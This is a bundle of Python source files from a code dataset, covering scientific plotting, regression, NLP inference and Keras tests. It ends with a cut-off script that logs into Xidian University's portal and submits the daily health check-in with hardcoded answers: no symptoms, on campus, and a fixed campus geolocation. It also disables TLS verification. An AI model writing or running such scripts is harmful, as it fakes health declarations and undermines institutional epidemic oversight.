plt.subplot(gs[2:4,0:2])\n self.axes[\"p\"] = plt.subplot(gs[2:4,2])\n# self.axes[\"T\"] = plt.subplot(gs[0:2,3])\n# self.axes[\"V\"] = plt.subplot(gs[2:4,3])\n self.axes[\"N\"] = plt.subplot(gs[0,3])\n self.axes[\"P\"] = plt.subplot(gs[1,3])\n self.axes[\"E\"] = plt.subplot(gs[2,3])\n self.axes[\"L\"] = plt.subplot(gs[3,3])\n \n \n # distribution function (filled contour)\n self.axes[\"f\"] = plt.subplot(gs[0:2,0:2])\n self.axes [\"f\"].set_title('$f (x,v)$')\n self.conts[\"f\"] = self.axes[\"f\"].contourf(self.grid.x, self.grid.v, self.distribution.f.T, self.nconts, cmap=self.cmap, norm=self.fnorm)\n self.cbars[\"f\"] = plt.colorbar(self.conts[\"f\"], orientation='vertical')\n \n # Hamilton function (filled contour)\n self.axes[\"h\"] = plt.subplot(gs[2:4,0:2])\n self.axes[\"h\"].set_title('$H (x,v)$')\n self.conts[\"h\"] = self.axes[\"h\"].contourf(self.grid.x, self.grid.v, self.hamiltonian.h.T, self.nconts, norm=self.hnorm)\n self.cbars[\"h\"] = plt.colorbar(self.conts[\"h\"], orientation='vertical')\n\n # density profile\n self.lines[\"n\"], = self.axes[\"n\"].plot(self.x, self.n)\n# self.axes [\"n\"].axis([self.grid.xMin, self.grid.xMax, self.density_min, self.density_max])\n self.axes [\"n\"].set_title('$n (x)$')\n# self.axes [\"n\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"n\"].set_xlim((0.0, self.grid.xLength())) \n\n # potential profile\n self.lines[\"p\"], = self.axes[\"p\"].plot(self.x, self.phi)\n# self.axes [\"p\"].axis([self.grid.xMin, self.grid.xMax, self.potential_min, self.potential_max])\n self.axes [\"p\"].set_title('$\\phi (x)$')\n self.axes [\"p\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"p\"].set_xlim((0.0, self.grid.xLength())) \n \n \n tStart, tEnd, xStart, xEnd = self.get_timerange()\n\n# # kinetic energy (time trace)\n# self.lines[\"T\"], = self.axes[\"T\"].plot(self.grid.t[tStart:tEnd], self.ekin[tStart:tEnd])\n# self.axes [\"T\"].set_title('$E_{kin} (t)$')\n# self.axes [\"T\"].set_xlim((xStart,xEnd)) \n# # self.axes [\"T\"].yaxis.set_major_formatter(majorFormatter)\n# \n# # potential energy (time trace)\n# self.lines[\"V\"], = self.axes[\"V\"].plot(self.grid.t[tStart:tEnd], self.epot[tStart:tEnd])\n# self.axes [\"V\"].set_title('$E_{pot} (t)$')\n# self.axes [\"V\"].set_xlim((xStart,xEnd)) \n# # self.axes [\"V\"].yaxis.set_major_formatter(majorFormatter)\n \n \n self.lines[\"N\"], = self.axes[\"N\"].plot(self.grid.t[tStart:tEnd], self.partnum [tStart:tEnd])\n self.lines[\"P\"], = self.axes[\"P\"].plot(self.grid.t[tStart:tEnd], self.momentum [tStart:tEnd])\n self.lines[\"E\"], = self.axes[\"E\"].plot(self.grid.t[tStart:tEnd], self.energy [tStart:tEnd])\n self.lines[\"L\"], = self.axes[\"L\"].plot(self.grid.t[tStart:tEnd], self.enstrophy[tStart:tEnd])\n# self.lines[\"E_f\"], = self.axes[\"E\"].plot(self.grid.t[tStart:tEnd], self.energy_f [tStart:tEnd])\n# self.lines[\"E_p\"], = self.axes[\"E\"].plot(self.grid.t[tStart:tEnd], self.energy_p [tStart:tEnd])\n \n self.axes [\"N\"].set_title('$\\Delta N (t)$')\n if np.abs(self.hamiltonian.P0) < 1E-3: \n self.axes [\"P\"].set_title('$P (t)$')\n else:\n self.axes [\"P\"].set_title('$\\Delta P (t)$')\n self.axes [\"E\"].set_title('$\\Delta E (t)$')\n self.axes [\"L\"].set_title('$\\Delta L_{2} (t)$')\n\n self.axes [\"N\"].set_xlim((xStart,xEnd)) \n self.axes [\"P\"].set_xlim((xStart,xEnd)) \n self.axes [\"E\"].set_xlim((xStart,xEnd)) \n self.axes [\"L\"].set_xlim((xStart,xEnd)) \n \n self.axes [\"N\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"P\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"E\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"L\"].yaxis.set_major_formatter(majorFormatter)\n \n \n # switch off some ticks\n plt.setp(self.axes[\"f\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"n\"].get_xticklabels(), visible=False)\n# plt.setp(self.axes[\"T\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"N\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"P\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"E\"].get_xticklabels(), visible=False)\n \n \n self.update()\n \n \n \n def save_plots(self):\n filename = str('F_%06d' % self.iTime) + '.png'\n extent = self.axes[\"f\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('N_%06d' % self.iTime) + '.png'\n extent = self.axes[\"N\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('P_%06d' % self.iTime) + '.png'\n extent = self.axes[\"P\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('E_%06d' % self.iTime) + '.png'\n extent = self.axes[\"E\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('L2_%06d' % self.iTime) + '.png'\n extent = self.axes[\"L\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n\n \n def update_boundaries(self):\n self.fmin = +1e40\n self.fmax = -1e40\n \n self.fmin = min(self.fmin, self.distribution.f.min() )\n self.fmax = max(self.fmax, self.distribution.f.max() )\n\n\n self.hmin = +1e40\n self.hmax = -1e40\n \n self.hmin = min(self.hmin, self.hamiltonian.h.min() )\n self.hmax = max(self.hmax, self.hamiltonian.h.max() )\n\n \n df = self.fmax - self.fmin\n \n self.fnorm = colors.Normalize(vmin=self.fmin + 0.05 * df, vmax=self.fmax + 0.05*df)\n self.hnorm = colors.Normalize(vmin=self.hmin, vmax=self.hmax)\n \n self.density_min =-1.0\n self.density_max = 1.5 * self.distribution.density.max()\n \n# self.potential_min = 1.5 * self.potential.phi.min()\n# self.potential_max = 1.5 * self.potential.phi.max()\n# \n# if self.potential_min == self.potential_max:\n# self.potential_min -= 1.0\n# self.potential_max += 1.0\n \n \n def update(self, final=False):\n \n if not (self.iTime == 1 or (self.iTime-1) % self.nPlot == 0 or self.iTime-1 == self.nTime):\n return\n \n# self.update_boundaries()\n\n for ckey, cont in self.conts.items():\n for coll in cont.collections:\n self.axes[ckey].collections.remove(coll)\n \n# self.fnorm = colors.Normalize(vmin=self.fmin, vmax=self.fmax)\n \n self.conts[\"f\"] = self.axes[\"f\"].contourf(self.grid.x, self.grid.v, self.distribution.f.T, self.nconts, cmap=self.cmap, norm=self.fnorm)\n self.conts[\"h\"] = self.axes[\"h\"].contourf(self.grid.x, self.grid.v, self.hamiltonian.h.T, self.nconts, norm=self.hnorm)\n \n \n self.n [0:-1] = self.distribution.density\n self.n [ -1] = self.distribution.density[0]\n self.phi[0:-1] = self.potential.phi\n self.phi[ -1] = self.potential.phi[0]\n \n self.lines[\"n\"].set_ydata(self.n)\n self.axes [\"n\"].relim()\n self.axes [\"n\"].autoscale_view()\n \n self.lines[\"p\"].set_ydata(self.phi)\n self.axes [\"p\"].relim()\n self.axes [\"p\"].autoscale_view()\n \n \n if self.vMax > 0.0:\n self.axes[\"f\"].set_ylim((-self.vMax, +self.vMax)) \n \n \n tStart, tEnd, xStart, xEnd = self.get_timerange()\n \n# self.lines[\"T\"].set_xdata(self.grid.t[tStart:tEnd])\n# self.lines[\"T\"].set_ydata(self.ekin[tStart:tEnd])\n# self.axes [\"T\"].relim()\n# self.axes [\"T\"].autoscale_view()\n# self.axes [\"T\"].set_xlim((xStart,xEnd)) \n# \n# self.lines[\"V\"].set_xdata(self.grid.t[tStart:tEnd])\n# self.lines[\"V\"].set_ydata(self.epot[tStart:tEnd])\n# self.axes [\"V\"].relim()\n# self.axes [\"V\"].autoscale_view()\n# self.axes [\"V\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"N\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"N\"].set_ydata(self.partnum[tStart:tEnd])\n self.axes [\"N\"].relim()\n self.axes [\"N\"].autoscale_view()\n self.axes [\"N\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"P\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"P\"].set_ydata(self.momentum[tStart:tEnd])\n self.axes [\"P\"].relim()\n self.axes [\"P\"].autoscale_view()\n self.axes [\"P\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"E\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"E\"].set_ydata(self.energy[tStart:tEnd])\n self.axes [\"E\"].relim()\n self.axes [\"E\"].autoscale_view()\n self.axes [\"E\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"L\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"L\"].set_ydata(self.enstrophy[tStart:tEnd])\n self.axes [\"L\"].relim()\n self.axes [\"L\"].autoscale_view()\n self.axes [\"L\"].set_xlim((xStart,xEnd)) \n \n \n plt.draw()\n plt.show(block=final)\n \n return self.figure\n \n \n def add_timepoint(self):\n# E = self.hamiltonian.E_kin + self.hamiltonian.E_pot + self.potential.E\n# E0 = self.hamiltonian.E_kin0 + self.hamiltonian.E_pot0 + self.potential.E0\n \n E0 = self.hamiltonian.E0\n E = self.hamiltonian.E\n \n if np.abs(self.hamiltonian.P0) < 1E-3: \n self.momentum[self.iTime] = self.hamiltonian.P\n else:\n self.momentum[self.iTime] = self.hamiltonian.P_error\n \n self.energy [self.iTime] = (E - E0) / E0\n self.partnum [self.iTime] = self.distribution.N_error\n self.enstrophy[self.iTime] = self.distribution.L2_error\n self.entropy [self.iTime] = self.distribution.S_error\n \n self.title.set_text('t = %1.2f' % (self.grid.t[self.iTime]))\n \n self.iTime += 1\n \n \n def get_timerange(self):\n tStart = self.iTime - (self.nTime+1)\n tEnd = self.iTime\n \n if tStart < self.iStart:\n tStart = self.iStart\n \n xStart = self.grid.t[tStart]\n xEnd = self.grid.t[tStart+self.nTime]\n \n return tStart, tEnd, xStart, xEnd\n \n","sub_path":"vlasov/plot/plot_replay.py","file_name":"plot_replay.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316129027","text":"import random\n\nprint (\"Please enter a number: \")\nnumber = input()\nnumber = int(number)\nprint(\"Your number is: \" + str(number))\n\ndef roll(number):\n result = random.randint(1, number)\n print(\"Below is a randomly selected number between 1 and \" + str(number))\n print(result)\n\n\n\nroll(number)\n\n","sub_path":"IntroToPython/RandomNumber/CustomRandomFunction.py","file_name":"CustomRandomFunction.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260155510","text":"# -*- coding:UTF-8 -*-\n__author__ = \"KenLee\"\n__email__ = \"hellokenlee@163.com\"\n\nimport os\nimport sys\nimport time\nimport math\n\nPROJECT_DIR = os.path.abspath(\"../../../Project/\")\nPROJECT_BUILD_DIR = os.path.join(os.path.join(PROJECT_DIR, \"x64\"), \"DebugGL\")\nsys.path.append(PROJECT_BUILD_DIR)\n\nimport nene\n\nfrom nene import Vec3\nfrom nene import Utils\nfrom nene import Model\nfrom nene import Shader\nfrom nene import Camera\nfrom nene import Keyboard\nfrom nene import Geometry\nfrom nene import CoordinateAxes\nfrom nene import CameraController\nfrom nene import NeneConstantBuffer\nfrom nene import ConstantBufferPool\n\n\ndef mycallback(eve):\n\tif eve.code == int(nene.EventCode.ON_KEY_PRESS):\n\t\tif eve.key == int(nene.Key.ESCAPE):\n\t\t\tUtils.set_window_should_close(True)\n\t\tpass\n\n\ndef main():\n\t#\n\tUtils.init(\"Nene Python\", 800, 600)\n\tUtils.clear_color(0.1, 0.1, 0.1)\n\t#\n\tKeyboard.instance().on_press.add_callback(mycallback)\n\t#\n\tcbp = ConstantBufferPool()\n\tcc = CameraController()\n\tca = CoordinateAxes(100.0, 10.0)\n\t#\n\tquad = Geometry.create_quad(nene.COUNTER_CLOCK_WISE)\n\tshader0 = Shader(\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Screen.vert\"),\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Screen.frag\"),\n\t\tnene.VertexFormat.POSITION_NORMAL_TEXTURE, True\n\t)\n\tshader1 = Shader(\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Common.vert\"),\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Common.frag\"),\n\t\tnene.VertexFormat.POSITION_NORMAL_TEXTURE, True\n\t)\n\t#\n\thouse = Model(os.path.join(PROJECT_DIR, \"Resource/Mesh/house/house.obj\"))\n\t#\n\thouse.scale_to(0.001)\n\t#\n\thouse.move_to(Vec3(1.0, 1.0, 1.0))\n\t#\n\twhile not Utils.window_should_close():\n\t\t#\n\t\tUtils.update()\n\t\tUtils.clear()\n\t\t#\n\t\tcc.update()\n\t\tcc.get_camera().use()\n\t\t#\n\t\tNeneConstantBuffer.instance().per_frame.update(0)\n\t\t#\n\t\tca.draw()\n\t\t#\n\t\thouse.draw(shader1)\n\t\t#\n\t\tUtils.swap_buffers()\n\t#\n\tUtils.terminate()\n\t#\n\tos._exit(0)\n\tpass\n\nif __name__ == '__main__':\n\tmain()\n\tpass\n","sub_path":"Source/NeneSample/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"37546666","text":"import matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\nclass Barcode(object):\r\n\r\n \"\"\"plot a DNA sequence.\"\"\"\r\n\r\n def __init__(self, seq):\r\n self.seq = seq\r\n self.length = len(seq)\r\n\r\n def plot_barcode(self):\r\n fig = plt.figure(dpi=90, facecolor='white')\r\n\r\n plt.axis('off')\r\n\r\n x0 = 0.1\r\n y0 = 7\r\n for index, value in enumerate(self.seq):\r\n x1 = [x0, x0]\r\n y1 = [y0, y0+1]\r\n y2 = [y0+1, y0+1.1]\r\n if value == 'A':\r\n plt.plot(x1, y1, linewidth=2.0, color='green')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='green')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n if value == 'C':\r\n plt.plot(x1, y1, linewidth=2.0, color='blue')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='blue')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n if value == 'G':\r\n plt.plot(x1, y1, linewidth=2.0, color='black')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='black')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n if value == 'T':\r\n plt.plot(x1, y1, linewidth=2.0, color='red')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='red')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n x0 += 0.0005\r\n\r\n plt.show()\r\n\r\n\r\ntext = list(\r\n 'CTTCGACGGACGCACGGCTAGTGGTGGTTTTCAAGGCCTTCGTATCGAGCTGTGCATACGCGAGGACCG')\r\n\r\nif __name__ == '__main__':\r\n import plot_barcode\r\n seq = Barcode(text)\r\n seq.plot_barcode()\r\n","sub_path":"plot_barcode.py","file_name":"plot_barcode.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"575909414","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as st\nimport collections\n\n#Load Data with pandas, and parse the first column into datetime\ntrain = pd.read_csv('data/train.csv', parse_dates=[0])\ntest = pd.read_csv('data/test.csv', parse_dates=[0])\n\n#print train.head()\n\n#Feature engineering\ntemp_train = pd.DatetimeIndex(train['datetime'])\ntrain['year'] = temp_train.year\ntrain['month'] = temp_train.month\ntrain['hour'] = temp_train.hour\ntrain['weekday'] = temp_train.weekday\n\ntemp_test = pd.DatetimeIndex(test['datetime'])\ntest['year'] = temp_test.year\ntest['month'] = temp_test.month\ntest['hour'] = temp_test.hour\ntest['weekday'] = temp_test.weekday\n\n#Define features vector\nfeatures = ['season', 'holiday', 'workingday', 'weather',\n 'temp', 'atemp', 'humidity', 'windspeed', 'year',\n 'month', 'weekday', 'hour']\n\n# plt.figure()\n# plt.hist(train['casual'].values, histtype='bar')\n# plt.show()\n#\n# import scipy.stats as stats\n# plt.figure()\n# graph = stats.probplot(train['atemp'], dist=\"norm\", plot=plt)\n# plt.show()\n#\n#\n# sm = pd.scatter_matrix(train, alpha=0.05, figsize=(10,10), diagonal='hist')\n#\n# [s.xaxis.label.set_rotation(45) for s in sm.reshape(-1)]\n# [s.yaxis.label.set_rotation(0) for s in sm.reshape(-1)]\n#\n# #May need to offset label when rotating to prevent overlap of figure\n# [s.get_yaxis().set_label_coords(-0.3,0.5) for s in sm.reshape(-1)]\n#\n# #Hide all ticks\n# [s.set_xticks(()) for s in sm.reshape(-1)]\n# [s.set_yticks(()) for s in sm.reshape(-1)]\n#\n# plt.show()\n\n# #y ticklabels\n# [plt.setp(item.yaxis.get_majorticklabels(), 'size', 5) for item in fig.ravel()]\n# #x ticklabels\n# [plt.setp(item.xaxis.get_majorticklabels(), 'size', 5) for item in fig.ravel()]\n# #y labels\n# [plt.setp(item.yaxis.get_label(), 'size', 9) for item in fig.ravel()]\n# #x labels\n# [plt.setp(item.xaxis.get_label(), 'size', 9) for item in fig.ravel()]\n#\n# plt.show()\n\n# fig, axes = plt.subplots(nrows=2)\n#\n# counts = collections.Counter(train['season'].values)\n# axes[0].bar(counts.keys(), counts.values(), color='red',align='center')\n# axes[0].set(title='Season')\n# axes[0].set_xticks(counts.keys())\n#\n# counts = collections.Counter(train['workingday'].values)\n# axes[1].bar(counts.keys(), counts.values(), color='red',align='center')\n# axes[1].set(title='Working day')\n# axes[1].set_xticks(counts.keys())\n#\n# plt.show()\n\n#axes[1].bar(train['workingday'].values, color='red')\n#axes[1].set(title='Registered')\n#plt.show()\n\n#The evaluation metric is the RMSE in the log domain,\n#so we should transform the target columns into log domain as well.\nfor col in ['casual', 'registered', 'count']:\n train['log-' + col] = train[col].apply(lambda x: np.log1p(x))\n\n#Split train data set into training and validation sets\n#np.random.shuffle(train.values)\ntraining, validation = train[:int(0.95*len(train))], train[int(0.95*len(train)):]\n\n# Create a linear model\nX = st.add_constant(training[features])\n\nmodel = st.OLS(training['log-count'],X) # OLS stands for Ordinary Least Squares\nf = model.fit()\n\nvalidnew=validation[features]\nvalidnew.insert(0, 'const', 1)\n\nypred = f.predict(validnew)\nprint(np.expm1(ypred))\n\nfig, ax = plt.subplots()\nplt.plot(validnew['atemp'], np.expm1(ypred), 'o', validation['atemp'], np.expm1(validation['log-count']), 'ro');\nax.set_title('blue: true, red: OLS')\nax.set_xlabel('atemp')\nax.set_ylabel('count')\nplt.show()\n\ntestnew=test[features]\ntestnew.insert(0, 'const', 1)\n\nypredtest = f.predict(testnew)\n\nresult = [round(np.expm1(x)) for x in ypredtest]\n\ndf=pd.DataFrame({'datetime':test['datetime'], 'count':result})\ndf.to_csv('output/linearregression_output.csv', index = False, columns=['datetime','count'])","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378467912","text":"# prediction using the segmentor-classifier for ACs\nimport os\nimport pickle\nimport sys\nfrom argparse import ArgumentParser\n\nimport torch\n\nfrom src.ac_tagging import post_process\nfrom src.models import BiLSTM_Segmentor_Classifier, BiLSTM_Segmentor_Classifier_no_pos\nfrom src.utils import HyperParams, mode_dict\n\n\ndef main(mode, config_file_path, trained_model_path):\n # train the segmentor-classifier first\n h_params = HyperParams(config_file_path)\n from src.utils.preprocess import get_train_test_split\n from src.utils.preprocess import prepare_data\n\n torch.manual_seed(h_params.rand_seed)\n _, test_files = get_train_test_split(os.path.abspath(os.path.join(\"..\", \"data\", \"train-test-split.csv\")))\n test_data, ept_offsets = prepare_data(mode, test_files)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n SegmentorClassifier = BiLSTM_Segmentor_Classifier if h_params.use_pos else BiLSTM_Segmentor_Classifier_no_pos\n model = SegmentorClassifier(h_params.d_word_embd, h_params.d_pos_embd, h_params.d_h1,\n h_params.n_lstm_layers, h_params.word_voc_size, h_params.pos_voc_size,\n h_params.ac_tagset_size, h_params.batch_size, device,\n h_params.pretraind_embd_layer_path)\n # load trained model state-dict\n checkpoint = torch.load(trained_model_path)\n model.load_state_dict(checkpoint['model_state_dict'])\n ## set CUDA if available\n if torch.cuda.is_available():\n model.cuda()\n # set evaluation mode mode\n model.eval()\n # inference for all chosen data\n preds = []\n with torch.no_grad():\n for (indexed_tokens, indexed_POSs, indexed_AC_tags) in test_data:\n tag_scores = model((indexed_tokens.to(device),indexed_POSs.to(device))) # get log soft max for input\n preds.append(torch.argmax(tag_scores, dim=1).tolist())\n # post-process for fine tuning\n ac_tag2ix = pickle.load(open(os.path.join(h_params.vocab_dir,\"ac_tag2ix.pcl\"),'rb'))\n corrected_tags = post_process(preds, ac_tag2ix)\n # save results\n results_file = os.path.join(h_params.exps_dir,os.path.split(trained_model_path)[-1][:-3]+\".results\")\n\n true_tags = [ac_tags.tolist() for _,_,ac_tags in test_data]\n with open(results_file,'wt') as f:\n # write header for file\n f.write(\"\\t\".join((\"# essay_paragraph_token_index\",\"true AC-tag\",\"predicted AC-tag\",\"post processed AC tag\"))+'\\n')\n # iterate over results (by appropriate devision)\n for i_seq in range(len(preds)):\n for i_tok in range(len(preds[i_seq])):\n e_p_t_index = ept_offsets[i_seq][i_tok]\n true_tag = true_tags[i_seq][i_tok]\n predicted_ac_tag = preds[i_seq][i_tok]\n post_processed_tag = corrected_tags[i_seq][i_tok]\n f.write(\"\\t\".join((str(e_p_t_index),str(true_tag),str(predicted_ac_tag),str(post_processed_tag))))\n f.write('\\n')\n\n sys.stdout.write(\"finished predictions and saved to {}\".format(os.path.abspath(results_file)))\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument('-m', '--mode', default='s', choices=['s', 'p', 'e'], help=\"\"\"context learning mode:\n - 's' - sentence\"\n - 'p' - paragraph\"\n - 'e' - essay\"\"\")\n\n parser.add_argument('-cp', '--config_path', default=os.path.abspath(os.path.join(\"..\", \"params.conf\")),\n help=\" path to learning parameters file\")\n\n parser.add_argument('-mp', '--model_path', required=True, help=\" path to trained model\")\n args = parser.parse_args(sys.argv[1:])\n mode = mode_dict[args.mode]\n main(mode, os.path.abspath(args.config_path), os.path.abspath(args.model_path))","sub_path":"src/ac_tagging/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"397086126","text":"import os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom autokeras import keras_layers as layer_module\n\n\ndef get_data():\n train = np.array([['a', 'ab', 2.1], ['b', 'bc', 1.0], ['a', 'bc', 'nan']])\n test = np.array([['a', 'ab', 2.1], ['x', 'bc', 1.0], ['a', 'bc', 'nan']])\n y = np.random.rand(3, 1)\n return train, test, y\n\n\ndef test_multi_column_categorical_encoding(tmp_path):\n x_train, x_test, y_train = get_data()\n input_node = tf.keras.Input(shape=(3,), dtype=tf.string)\n layer = layer_module.MultiColumnCategoricalEncoding([\n layer_module.INT,\n layer_module.INT,\n layer_module.NONE,\n ])\n hidden_node = layer(input_node)\n output_node = tf.keras.layers.Dense(1, activation='sigmoid')(hidden_node)\n model = tf.keras.Model(input_node, output_node)\n model.compile(loss='binary_crossentropy', optimizer='adam')\n tf.data.Dataset.zip((\n (tf.data.Dataset.from_tensor_slices(x_train).batch(32),),\n (tf.data.Dataset.from_tensor_slices(np.random.rand(3, 1)).batch(32),),\n ))\n layer.adapt(tf.data.Dataset.from_tensor_slices(x_train).batch(32))\n\n model.fit(x_train, y_train, epochs=1)\n\n model2 = tf.keras.Model(input_node, hidden_node)\n result = model2.predict(x_train)\n assert result[0][0] == result[2][0]\n assert result[0][0] != result[1][0]\n assert result[0][1] != result[1][1]\n assert result[0][1] != result[2][1]\n assert result[2][2] == 0\n\n output = model2.predict(x_test)\n assert output.dtype == np.dtype('float32')\n\n\ndef build_model():\n input_node = tf.keras.Input(shape=(3,), dtype=tf.string)\n layer = layer_module.MultiColumnCategoricalEncoding(encoding=[\n layer_module.INT, layer_module.INT, layer_module.NONE])\n output_node = layer(input_node)\n output_node = tf.keras.layers.Dense(1)(output_node)\n return tf.keras.Model(input_node, output_node), layer\n\n\ndef test_model_save(tmp_path):\n x_train, x_test, y_train = get_data()\n model, layer = build_model()\n layer.adapt(tf.data.Dataset.from_tensor_slices(x_train).batch(32))\n model.compile(optimizer='adam', loss='mse')\n model.fit(x_train, y_train, epochs=1, verbose=False)\n\n model.save(os.path.join(tmp_path, 'model'))\n model2 = tf.keras.models.load_model(os.path.join(tmp_path, 'model'),\n custom_objects=layer_module.CUSTOM_OBJECTS)\n\n assert np.array_equal(model.predict(x_train), model2.predict(x_train))\n\n\ndef test_weight_save(tmp_path):\n x_train, x_test, y_train = get_data()\n model, layer = build_model()\n layer.adapt(tf.data.Dataset.from_tensor_slices(x_train).batch(32))\n model.compile(optimizer='adam', loss='mse')\n model.fit(x_train, y_train, epochs=1, verbose=False)\n model.save_weights(os.path.join(tmp_path, 'checkpoint'))\n\n model2, _ = build_model()\n model2.load_weights(os.path.join(tmp_path, 'checkpoint'))\n\n assert np.array_equal(model.predict(x_train), model2.predict(x_train))\n","sub_path":"tests/autokeras/keras_layers_test.py","file_name":"keras_layers_test.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38841619","text":"# author: ZhaoKun\n# contact: 1161678627@qq.com\n# datetime: 2021-02-26 20:56\n# software: PyCharm\n\nimport requests\nrequests.packages.urllib3.disable_warnings()\nimport time\nimport schedule\n\ndef GetNowTime():\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n date = date[:-3]\n date = date.replace(' ', '日').replace(':', '时') + '分'\n return date\n\n# 登录账户\ndef login_account(account_data):\n session = requests.session()\n url = 'https://xxcapp.xidian.edu.cn/uc/wap/login/check'\n session.headers = {\n 'Host': 'xxcapp.xidian.edu.cn',\n 'Origin': 'https://xxcapp.xidian.edu.cn',\n 'Referer': 'https://xxcapp.xidian.edu.cn/uc/wap/login?redirect=https%3A%2F%2Fxxcapp.xidian.edu.cn%2Fsite%2Fncov%2Fxidiandailyup',\n 'sec-ch-ua': '\"GoogleChrome\";v=\"87\",\"Not;ABrand\";v=\"99\",\"Chromium\";v=\"87\"',\n 'sec-ch-ua-mobile': '?0',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/87.0.4280.141Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest'\n }\n data = account_data\n response = session.post(url=url, data=data, verify=False)\n if '操作成功' not in response.content.decode():\n # 如果登陆失败,则稍等下再登录\n print(f'时间:{GetNowTime()} 用户{str(data)}登陆失败,正在尝试下一次登录!')\n time.sleep(60)\n session = login_account(account_data)\n else:\n print(f'时间:{GetNowTime()} 用户{str(data)}登陆成功!')\n # session.close()\n # print(response.json())\n return session\n\n# 提交数据\ndef submit_data(session):\n url = 'https://xxcapp.xidian.edu.cn/xisuncov/wap/open-report/save'\n data = {\n 'sfzx':'1',\n 'tw':'1',\n 'address': '陕西省西安市雁塔区电子城街道科技大道南段西安电子科技大学北校区',\n 'geo_api_info': '{\"type\":\"complete\",\"info\":\"SUCCESS\",\"status\":1,\"cEa\":\"jsonp_428024_\",\"position\":{\"Q\":34.23239,\"R\":108.91516000000001,\"lng\":108.91516,\"lat\":34.23239},\"message\":\"GetipLocationsuccess.Getaddresssuccess.\",\"location_type\":\"ip\",\"accuracy\":null,\"isConverted\":true,\"addressComponent\":{\"citycode\":\"029\",\"adcode\":\"610113\",\"businessAreas\":[],\"neighborhoodType\":\"\",\"neighborhood\":\"\",\"building\":\"\",\"buildingType\":\"\",\"street\":\"白沙路\",\"streetNumber\":\"附8号\",\"country\":\"中国\",\"province\":\"陕西省\",\"city\":\"西安市\",\"district\":\"雁塔区\",\"township\":\"电子城街道\"},\"formattedAddress\":\"陕西省西安市雁塔区电子城街道科技大道南段西安电子科技大学北校区\",\"roads\":[],\"crosses\":[],\"pois\":[]}',\n 'area': '陕西省西安市雁塔区',\n 'province': '陕西省',\n 'city': '西安市',\n 'sfcyglq':'0',\n 'sfyzz':'0',\n 'qtqk':'',\n 'ymtys':'0'\n }\n response = session.post(url=url, data=data, verify=False)\n print(response.text)\n session.close()\n 